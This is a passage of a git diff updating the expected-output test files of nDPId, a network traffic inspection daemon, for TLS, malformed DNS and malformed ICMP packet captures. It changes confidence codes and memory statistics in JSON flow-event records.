.dataq.aliyuncs.com,*.datav.aliyun.com,*.datav.aliyuncs.com,*.devlops.aliyun.com,*.devops.aliyun.com,*.ditu.aliyun.com,*.domain.aliyun.com,*.dyiot.aliyun.com,*.ebs.aliyun.com,*.emas.aliyun.com,*.emr.aliyun.com,*.enterprise.aliyun.com,*.env.aliyun.com,*.et-industry.aliyun.com,*.eu-central-1.aliyuncs.com,*.eu-west-1.aliyuncs.com,*.fc.aliyun.com,*.feedback.console.aliyun.com,*.gts-x.aliyun.com,*.gts.aliyun.com,*.help-ccs.aliyun.com,*.ialicdn.com,*.in-mumbai.aliyuncs.com,*.iot.aliyun.com,*.jp-fudao.aliyuncs.com,*.linkedmall.aliyun.com,*.linkwan.aliyun.com,*.living.aliyun.com,*.luban.aliyun.com,*.m.aliyun.com,*.market.aliyun.com,*.maxcompute.aliyun.com,*.me-east-1.aliyuncs.com,*.media.aliyun.com,*.microdingtalk.aliyun.com,*.mit.aliyun.com,*.mobile.aliyun.com,*.msea.aliyun.com,*.mts.aliyun.com,*.mvp.aliyun.com,*.nebula.aliyun.com,*.nls.aliyuncs.com,*.odps.aliyun.com,*.ons.aliyun.com,*.ose.aliyun.com,*.pai.data.aliyun.com,*.pcs-gw-cn-beijing.aliyun.com,*.pcs-gw-cn-shanghai.aliyun.com,*.phpwind.com,*.phpwind.net,*.pre-sg-purchase.aliyun.com,*.prepub.aliyun.com,*.product.center.aliyun.com,*.pts.aliyun.com,*.r-app-cn-beijing-data.aliyun.com,*.r-app-cn-hangzhou-data.aliyun.com,*.r-app-cn-shenzhen-data.aliyun.com,*.r-app-data.aliyun.com,*.rdc.aliyun.com,*.rds.aliyun.com,*.reid.aliyun.com,*.sc-cmdb.aliyuncs.com,*.scsp.aliyun.com,*.sg.aliyuncs.com,*.shuju.aliyun.com,*.smart.aliyun.com,*.soc.aliyun.com,*.soc.aliyuncs.com,*.sparenode.com,*.supet.com,*.tburl.in,*.teambition.com,*.teambition.net,*.teambitionapis.com,*.tianchi.aliyun.com,*.toolkit.aliyun.com,*.tv.aliyun.com,*.tw-gaoxiong.aliyuncs.com,*.us-east-1.aliyuncs.com,*.us-west-1.aliyuncs.com,*.webide.aliyun.com,*.yuntu.aliyun.com,account.www.net.cn,alibabacloud.co.in,alibabacloud.com,alibabacloud.com.au,alibabacloud.com.hk,alibabacloud.com.my,alibabacloud.com.sg,alibabacloud.com.tw,alicdn.com,alicloud.com,alimei.com,aliyun-iot-share.com,aliyuncs.com,dc.www.net.cn,dmp.www.net.cn,dns.www.net.cn,panda.www.net.cn,pandavip.www.net.cn,phpwind.com,phpwind.net,scdnphi6.com,sparenode.com,supet.com,tburl.in,teambition.com,teambition.net,teambitionapis.com,tianchi-global.com,whois.www.net.cn,aliyun.com","ja3":"2a26b1a62e40d25d4de3babc9d532f30","ja3s":"eee3d2bf5f17d17548ac36ba1872951f","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=BE, O=GlobalSign nv-sa, CN=GlobalSign Organization Validation CA - SHA256 - G2","subjectDN":"C=CN, ST=ZheJiang, L=HangZhou, O=Alibaba (China) Technology Co., Ltd., CN=*.aliyun.com","alpn":"h2,http\/1.1","fingerprint":"2B:C6:82:22:E9:94:09:24:34:E1:5C:F1:24:76:98:75:45:78:53:DA"}} +00700{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":47,"source":"long_tls_certificate.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":47,"flow_first_seen":1609756181300,"flow_last_seen":1609756183162,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":12100,"flow_avg_l4_payload_len":257,"midstream":0,"thread_ts_msec":1609756183162,"l3_proto":"ip4","src_ip":"192.168.1.60","dst_ip":"106.15.100.123","src_port":55333,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Alibaba","breed":"Acceptable","category":"Web"}} 00570{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":47,"source":"long_tls_certificate.pcap","alias":"nDPId-test","packets-captured":47,"packets-processed":47,"total-skipped-flows":0,"total-l4-payload-len":12100,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":1,"total-detection-updates":2,"total-updates":0,"current-active-flows":0,"total-active-flows":1,"total-idle-flows":1,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":11,"global_ts_msec":1609756183162} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 47/47 @@ -17,9 +17,9 @@ ~~ total active/idle flows...: 1/1 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 6268074 bytes -~~ total memory freed........: 6268074 bytes -~~ total allocations/frees...: 118354/118354 +~~ total memory allocated....: 6401708 bytes +~~ total memory freed........: 6401708 bytes +~~ total allocations/frees...: 121116/121116 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 468 chars ~~ json string max len.......: 5070 chars diff --git a/test/results/malformed_dns.pcap.out b/test/results/malformed_dns.pcap.out index eacea0f97..c0f5a0eb0 100644 --- a/test/results/malformed_dns.pcap.out +++ b/test/results/malformed_dns.pcap.out @@ -2,11 +2,11 @@ 00553{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"malformed_dns.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-payload-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1591551760342} 00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"malformed_dns.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1591551760342,"flow_last_seen":1591551760342,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":1591551760342,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50435,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"malformed_dns.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1591551760342,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":70,"pkt_l4_len":36,"thread_ts_msec":1591551760342,"pkt":"AAAAAAAAAAAAAAAACABFAAA4nToAAEAR33h\/AAABfwAAAcUDADUAJP43hLQBAAABAAAAAAAAA3d3dwJ4dANjb20AAAEAAQ=="} -00760{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"malformed_dns.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1591551760342,"flow_last_seen":1591551760342,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":1591551760342,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50435,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"www.xt.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00760{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"malformed_dns.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1591551760342,"flow_last_seen":1591551760342,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":1591551760342,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50435,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"www.xt.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 02650{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"malformed_dns.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1591551760357,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1430,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1430,"pkt_l4_len":1396,"thread_ts_msec":1591551760357,"pkt":"\/\/\/\/\/\/\/\/AAAAAAAACABFAAWIAAEAAEARd2J\/AAABfwAAAQA1xQMFdLSchLSBAAACAAIAAAAAA3d3dwJ4dANjb20AAAEAASJBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBPwAAAAA\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8+Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz\/AQD0+Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/wEHAQjs8PT4\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/P8BDwETARcBGNzg5Ojs8PT4\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz\/AR8BIwEnASsBLwEzATcBOLzAxMjM0NTY3ODk6Ozw9Pj8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/wE\/AUMBRwFLAU8BUwFXAVsBXwFjAWcBawFvAXMBdwF4fICEiIyQlJicoKSorLC0uLzAxMjM0NTY3ODk6Ozw9PsBfwGDAYcBiwGPAZMBlwGbAZ8BowGnAasBrwGzAbcBuwG\/AcMBxwHLAc8B0wHXAdsB3wHjAecB6wHvAfMB9wH4AAQABwAwAAQABAAAAAAAEQkJCQsAMAAUAAQAAAAAATANBQUE\/MDAwMDEwMDAyMDAxMTAwMTIwMDIxMDAyMjAxMDEwMjAxMTEwMTEyMDEyMTAxMjIwMjAyMTEwMjEyMDIyMTAyBQAAAAAAwP8="} -00893{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2,"source":"malformed_dns.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1591551760342,"flow_last_seen":1591551760357,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":1416,"flow_avg_l4_payload_len":708,"midstream":0,"thread_ts_msec":1591551760357,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50435,"dst_port":53,"l4_proto":"udp","ndpi": {"flow_risk": {"17": {"risk":"Malformed Packet","severity":"Low","risk_score": {"total":260,"client":130,"server":130}}},"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"www.xt.com","num_queries":2,"num_answers":2,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"0.0.0.0"}} +00893{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2,"source":"malformed_dns.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1591551760342,"flow_last_seen":1591551760357,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":1416,"flow_avg_l4_payload_len":708,"midstream":0,"thread_ts_msec":1591551760357,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50435,"dst_port":53,"l4_proto":"udp","ndpi": {"flow_risk": {"17": {"risk":"Malformed Packet","severity":"Low","risk_score": {"total":260,"client":130,"server":130}}},"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"www.xt.com","num_queries":2,"num_answers":2,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"0.0.0.0"}} 02650{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"malformed_dns.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1591551760372,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1430,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1430,"pkt_l4_len":1396,"thread_ts_msec":1591551760372,"pkt":"\/\/\/\/\/\/\/\/AAAAAAAACABFAAWIAAEAAEARd2J\/AAABfwAAAQA1xQMFdLSchLSBAAACAAIAAAAAA3d3dwJ4dANjb20AAAEAASJBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBPwAAAAA\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8+Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz\/AQD0+Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/wEHAQjs8PT4\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/P8BDwETARcBGNzg5Ojs8PT4\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz\/AR8BIwEnASsBLwEzATcBOLzAxMjM0NTY3ODk6Ozw9Pj8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/Pz8\/wE\/AUMBRwFLAU8BUwFXAVsBXwFjAWcBawFvAXMBdwF4fICEiIyQlJicoKSorLC0uLzAxMjM0NTY3ODk6Ozw9PsBfwGDAYcBiwGPAZMBlwGbAZ8BowGnAasBrwGzAbcBuwG\/AcMBxwHLAc8B0wHXAdsB3wHjAecB6wHvAfMB9wH4AAQABwAwAAQABAAAAAAAEQkJCQsAMAAUAAQAAAAAATANBQUE\/MDAwMDEwMDAyMDAxMTAwMTIwMDIxMDAyMjAxMDEwMjAxMTEwMTEyMDEyMTAxMjIwMjAyMTEwMjEyMDIyMTAyBQAAAAAAwP8="} -00798{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6,"source":"malformed_dns.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":6,"flow_first_seen":1591551760342,"flow_last_seen":1591551765368,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":5608,"flow_avg_l4_payload_len":934,"midstream":0,"thread_ts_msec":1591551765368,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50435,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"17": {"risk":"Malformed Packet","severity":"Low","risk_score": {"total":260,"client":130,"server":130}}},"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} +00798{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6,"source":"malformed_dns.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":6,"flow_first_seen":1591551760342,"flow_last_seen":1591551765368,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":5608,"flow_avg_l4_payload_len":934,"midstream":0,"thread_ts_msec":1591551765368,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50435,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"17": {"risk":"Malformed Packet","severity":"Low","risk_score": {"total":260,"client":130,"server":130}}},"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} 00559{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":6,"source":"malformed_dns.pcap","alias":"nDPId-test","packets-captured":6,"packets-processed":6,"total-skipped-flows":0,"total-l4-payload-len":5608,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":1,"total-detection-updates":1,"total-updates":0,"current-active-flows":0,"total-active-flows":1,"total-idle-flows":1,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":10,"global_ts_msec":1591551765368} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 6/6 @@ -16,9 +16,9 @@ ~~ total active/idle flows...: 1/1 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 5869664 bytes -~~ total memory freed........: 5869664 bytes -~~ total allocations/frees...: 118122/118122 +~~ total memory allocated....: 6003298 bytes +~~ total memory freed........: 6003298 bytes +~~ total allocations/frees...: 120884/120884 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 469 chars ~~ json string max len.......: 2655 chars diff --git a/test/results/malformed_icmp.pcap.out b/test/results/malformed_icmp.pcap.out index a73d12bcb..cdb9d1f97 100644 --- a/test/results/malformed_icmp.pcap.out +++ b/test/results/malformed_icmp.pcap.out @@ -2,8 +2,8 @@ 00554{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"malformed_icmp.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-payload-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1593066612951} 00554{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"malformed_icmp.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1593066612951,"flow_last_seen":1593066612951,"flow_idle_time":140000,"flow_min_l4_payload_len":8,"flow_max_l4_payload_len":8,"flow_tot_l4_payload_len":8,"flow_avg_l4_payload_len":8,"midstream":0,"thread_ts_msec":1593066612951,"l3_proto":"ip4","src_ip":"218.152.179.213","dst_ip":"218.152.179.54","l4_proto":"icmp","flow_datalink":1,"flow_max_packets":3} 00438{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"malformed_icmp.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1593066612951,"flow_idle_time":140000,"pkt_oversize":false,"pkt_caplen":42,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":42,"pkt_l4_len":8,"thread_ts_msec":1593066612951,"pkt":"AFUir8Y3AERm\/CmvCABFAAAcAAEAAEABXqPamLPV2pizNqUAWv8AAAAA"} -00733{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"malformed_icmp.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1593066612951,"flow_last_seen":1593066612951,"flow_idle_time":140000,"flow_min_l4_payload_len":8,"flow_max_l4_payload_len":8,"flow_tot_l4_payload_len":8,"flow_avg_l4_payload_len":8,"midstream":0,"thread_ts_msec":1593066612951,"l3_proto":"ip4","src_ip":"218.152.179.213","dst_ip":"218.152.179.54","l4_proto":"icmp","ndpi": {"flow_risk": {"17": {"risk":"Malformed Packet","severity":"Low","risk_score": {"total":260,"client":130,"server":130}}},"confidence": {"4":"DPI"},"proto":"ICMP","breed":"Acceptable","category":"Network"}} -00772{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1,"source":"malformed_icmp.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1593066612951,"flow_last_seen":1593066612951,"flow_idle_time":140000,"flow_min_l4_payload_len":8,"flow_max_l4_payload_len":8,"flow_tot_l4_payload_len":8,"flow_avg_l4_payload_len":8,"midstream":0,"thread_ts_msec":1593066612951,"l3_proto":"ip4","src_ip":"218.152.179.213","dst_ip":"218.152.179.54","l4_proto":"icmp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"17": {"risk":"Malformed Packet","severity":"Low","risk_score": {"total":260,"client":130,"server":130}}},"confidence": {"4":"DPI"},"proto":"ICMP","breed":"Acceptable","category":"Network"}} +00733{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"malformed_icmp.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1593066612951,"flow_last_seen":1593066612951,"flow_idle_time":140000,"flow_min_l4_payload_len":8,"flow_max_l4_payload_len":8,"flow_tot_l4_payload_len":8,"flow_avg_l4_payload_len":8,"midstream":0,"thread_ts_msec":1593066612951,"l3_proto":"ip4","src_ip":"218.152.179.213","dst_ip":"218.152.179.54","l4_proto":"icmp","ndpi": {"flow_risk": {"17": {"risk":"Malformed Packet","severity":"Low","risk_score": {"total":260,"client":130,"server":130}}},"confidence": {"6":"DPI"},"proto":"ICMP","breed":"Acceptable","category":"Network"}} +00772{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1,"source":"malformed_icmp.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1593066612951,"flow_last_seen":1593066612951,"flow_idle_time":140000,"flow_min_l4_payload_len":8,"flow_max_l4_payload_len":8,"flow_tot_l4_payload_len":8,"flow_avg_l4_payload_len":8,"midstream":0,"thread_ts_msec":1593066612951,"l3_proto":"ip4","src_ip":"218.152.179.213","dst_ip":"218.152.179.54","l4_proto":"icmp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"17": {"risk":"Malformed Packet","severity":"Low","risk_score": 